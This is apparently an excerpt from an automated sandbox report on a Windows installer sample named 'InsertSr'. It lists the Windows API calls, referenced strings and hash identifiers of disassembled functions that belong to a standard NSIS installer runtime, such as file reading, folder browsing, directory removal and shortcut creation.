                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                            • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                            • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                            • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                            • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                            • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                            • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                            APIs
                                                                              • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                              • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                              • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                              • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                            • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                                            • String ID:
                                                                            • API String ID: 4115351271-0
                                                                            • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                            • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                            • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                            • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                            APIs
                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                            • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                            • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                            • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                            • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                            • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                            • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                            APIs
                                                                            • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                            • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                            • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                            • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                            • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                            • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                            • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                            • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                            • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                            • DeleteObject.GDI32(?), ref: 00404A79
                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                            • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                            • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                            • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                            • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $ @$M$N
                                                                            • API String ID: 1638840714-3479655940
                                                                            • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                            • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                            • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                            • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                            • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                            • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                            • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                            • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                            • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                            • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                            • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                              • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                              • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                              • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                              • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                              • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                              • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                            • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                              • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                            • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                            • String ID: 82D$@%F$@rD$A
                                                                            • API String ID: 3347642858-1086125096
                                                                            • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                            • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                            • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                            • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                            • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                            • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                            • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                            • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                            • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                            • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                            • API String ID: 1916479912-1189179171
                                                                            • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                            • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                            • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                            • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                            • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                            • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                            • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                            • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                            • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                            • FindClose.KERNEL32(?), ref: 00406E33
                                                                            Strings
                                                                            • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                            • \*.*, xrefs: 00406D03
                                                                            • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                            • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                            • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                            • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                            • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                            • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                            • API String ID: 2035342205-3294556389
                                                                            • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                            • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                            • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                            • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                            APIs
                                                                            • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                            • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                            • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                            • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                            • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                            • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                            • API String ID: 3581403547-784952888
                                                                            • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                            • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                            • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                            • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                            Strings
                                                                            • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInstance
                                                                            • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                            • API String ID: 542301482-1377821865
                                                                            • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                            • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                            • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
